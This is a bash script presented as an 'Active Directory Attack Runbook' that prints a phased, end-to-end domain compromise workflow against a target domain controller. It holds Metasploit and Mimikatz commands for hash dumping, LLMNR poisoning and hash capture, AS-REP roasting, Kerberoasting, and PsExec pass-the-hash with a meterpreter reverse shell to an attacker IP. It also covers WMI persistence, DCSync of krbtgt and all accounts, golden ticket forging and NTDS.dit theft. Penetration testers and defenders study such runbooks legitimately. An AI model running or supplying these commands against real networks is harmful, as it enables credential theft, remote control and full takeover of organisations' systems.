#!/usr/bin/env bash
# ==============================================================================
# ACTIVE DIRECTORY ATTACK RUNBOOK — Full AD compromise workflow
# Usage: bash ad-attack.sh <DOMAIN> <DC_IP> <ATTACKER_IP>
# ==============================================================================
DOMAIN="${1:-}"
DC_IP="${2:-}"
ATTACKER_IP="${3:-}"

[[ -z "$DOMAIN" ]] && { echo "Usage: bash ad-attack.sh <DOMAIN> <DC_IP> <ATTACKER_IP>"; echo "Example: bash ad-attack.sh corp.local 10.0.0.10 192.168.1.100"; exit 1; }

echo ""
echo "=== ACTIVE DIRECTORY ATTACK RUNBOOK ==="
echo "  Domain: $DOMAIN | DC: $DC_IP | Attacker: $ATTACKER_IP"
echo ""

# ── PHASE 1: Initial Recon ────────────────────────────────────────────────────
echo -e "--- ${BLUE}PHASE 1: Initial Reconnaissance${NC} ---"
echo ""
echo "  # LDAP Enumeration:"
echo "  use auxiliary/gather/ldap_hashdump"
echo "  set RHOSTS $DC_IP"
echo "  set DOMAIN $DOMAIN"
echo "  run"
echo ""
echo "  # Kerberos User Enumeration:"
echo "  use auxiliary/gather/kerberos_enumusers"
echo "  set RHOSTS $DC_IP"
echo "  set DOMAIN $DOMAIN"
echo "  run"
echo ""
echo "  # DNS Zone Transfer:"
echo "  dig @${DC_IP} ${DOMAIN} AXFR"
echo ""
echo "  # SMB Enumeration:"
echo "  use auxiliary/scanner/smb/smb_version"
echo "  set RHOSTS $DC_IP"
echo "  run"
echo ""

# ── PHASE 2: Initial Access ────────────────────────────────────────────────────
echo -e "--- ${RED}PHASE 2: Initial Access${NC} ---"
echo ""
echo "  # LLMNR/NBT-NS Poisoning + WPAD (if internal):"
echo "  use auxiliary/spoof/llmnr/llmnr_response"
echo "  set INTERFACE eth0"
echo "  run"
echo "  use auxiliary/server/capture/smb"
echo "  set JOHNPWFILE /tmp/ntlmv2_hashes.txt"
echo "  run"
echo ""
echo "  # AS-REP Roasting (no pre-auth needed):"
echo "  use auxiliary/gather/asrep_roast"
echo "  set DOMAIN $DOMAIN"
echo "  set USER_FILE /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt"
echo "  run"
echo ""
echo "  # Kerberoasting (with valid creds):"
echo "  use auxiliary/gather/kerberoast"
echo "  set DOMAIN $DOMAIN"
echo "  set USERNAME <USER>"
echo "  set PASSWORD <PASS>"
echo "  run"
echo ""

# ── PHASE 3: Lateral Movement ──────────────────────────────────────────────────
echo -e "--- ${MAGENTA}PHASE 3: Lateral Movement${NC} ---"
echo ""
echo "  # PsExec with hash:"
echo "  use exploit/windows/smb/psexec"
echo "  set RHOSTS $DC_IP"
echo "  set SMBUser administrator"
echo "  set SMBPass <NTLM_HASH>"
echo "  set PAYLOAD windows/x64/meterpreter/reverse_tcp"
echo "  set LHOST $ATTACKER_IP"
echo "  set LPORT 4444"
echo "  exploit"
echo ""
echo "  # WMI Exec:"
echo "  use exploit/windows/local/wmi_persistence"
echo "  set SESSION 1"
echo "  exploit"
echo ""

# ── PHASE 4: Domain Dominance ──────────────────────────────────────────────────
echo -e "--- ${RED}PHASE 4: Domain Dominance${NC} ---"
echo ""
echo "  # DCSync (after DA privs):"
echo "  # In meterpreter: load kiwi"
echo "  kiwi_cmd lsadump::dcsync /domain:${DOMAIN} /user:krbtgt"
echo "  kiwi_cmd lsadump::dcsync /domain:${DOMAIN} /all"
echo ""
echo "  # Golden Ticket:"
echo "  kiwi_cmd kerberos::golden /domain:${DOMAIN} /sid:<DOMAIN_SID> /krbtgt:<NTLM> /user:Administrator"
echo ""
echo "  # NTDS.dit extraction:"
echo "  run post/windows/gather/ntds_grabber"
echo ""

echo "=== RUNBOOK COMPLETE ==="